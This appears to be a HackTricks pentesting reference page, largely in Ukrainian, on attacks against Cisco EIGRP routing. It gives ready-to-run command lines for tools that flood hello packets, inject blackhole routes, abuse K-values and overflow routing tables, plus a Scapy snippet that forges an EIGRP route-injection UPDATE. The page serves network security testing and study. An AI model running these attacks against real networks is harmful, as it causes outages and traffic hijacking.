EIGRP Attacks
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
This is a summary of the attacks exposed in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Перегляньте його для додаткової інформації.
Fake EIGRP Neighbors Attack
- Objective: Перевантажити CPU маршрутизатора шляхом флуду EIGRP hello-пакетами, що може призвести до Denial of Service (DoS).
- Tool: helloflooding.py script.
- Execution:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parameters:
--interface: Вказує мережевий інтерфейс, наприклад,eth0.--as: Визначає номер автономної системи EIGRP, наприклад,1.--subnet: Встановлює підмережу, наприклад,10.10.100.0/24.
EIGRP Blackhole Attack
- Objective: Порушити потік мережевого трафіку, інжектуючи фальшивий маршрут, що призводить до blackhole — трафік спрямовується в неіснуюче місце призначення.
- Tool: routeinject.py script.
- Execution:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parameters:
--interface: Вказує інтерфейс системи атакуючого.--as: Визначає номер AS EIGRP.--src: Встановлює IP-адресу атакуючого.--dst: Встановлює IP цільової підмережі.--prefix: Визначає маску цільової підмережі.
Abusing K-Values Attack
- Objective: Створити постійні розриви та повторні підключення в домені EIGRP шляхом інжекції змінених K-values, що фактично призводить до DoS.
- Tool: relationshipnightmare.py script.
- Execution:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parameters:
--interface: Вказує мережевий інтерфейс.--as: Визначає номер AS EIGRP.--src: Встановлює IP-адресу легітимного маршрутизатора.
Routing Table Overflow Attack
- Objective: Навантажити CPU та RAM маршрутизатора шляхом заповнення таблиці маршрутів численними фальшивими маршрутами.
- Tool: routingtableoverflow.py script.
- Execution:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parameters:
--interface: Вказує мережевий інтерфейс.--as: Визначає номер AS EIGRP.--src: Встановлює IP-адресу атакуючого.
Protocol Notes Useful for Attacks
- HELLO packets carry K-values and neighbors only form when they match. Це основа для атак на невідповідність K-values/порушення відносин і пояснює, чому невідповідні K-values перешкоджають утворенню суміжності.
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, тому пасивні захоплення розкривають точні значення, що використовуються в сегменті.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy ships an EIGRP contrib layer with TLVs like EIGRPParam and EIGRPIntRoute, which is enough to craft UPDATEs for route injection. Example adapted from the davidbombal/scapy EIGRP route injection script:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
У тому ж репозиторії є швидкі скрипти “fake neighbor”, які перехоплюють реальний пакет EIGRP і відтворюють його з підробленою IP-адресою відправника, створюючи фантомні сусіди (корисно для навантаження CPU/таблиці сусідів).
- Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE допоміжні засоби
- Routopsy створює лабораторію атак з віртуальними маршрутизаторами (FRRouting + Scapy) і містить DRP-атаки, які можна адаптувати для тестів EIGRP. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap’s NSE має невелику бібліотеку
eigrpдля розбору/генерації підмножини пакетів EIGRP. https://nmap.org/nsedoc/lib/eigrp.html
Аутентифікаційна розвідка
- Режим named EIGRP підтримує HMAC-SHA-256 authentication через
authentication mode hmac-sha-256 .... Якщо увімкнено, підготовлені пакети повинні бути автентифіковані правильним ключем; якщо не увімкнено, spoofing/injection простіше виконати/підтвердити.
Посилання
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.


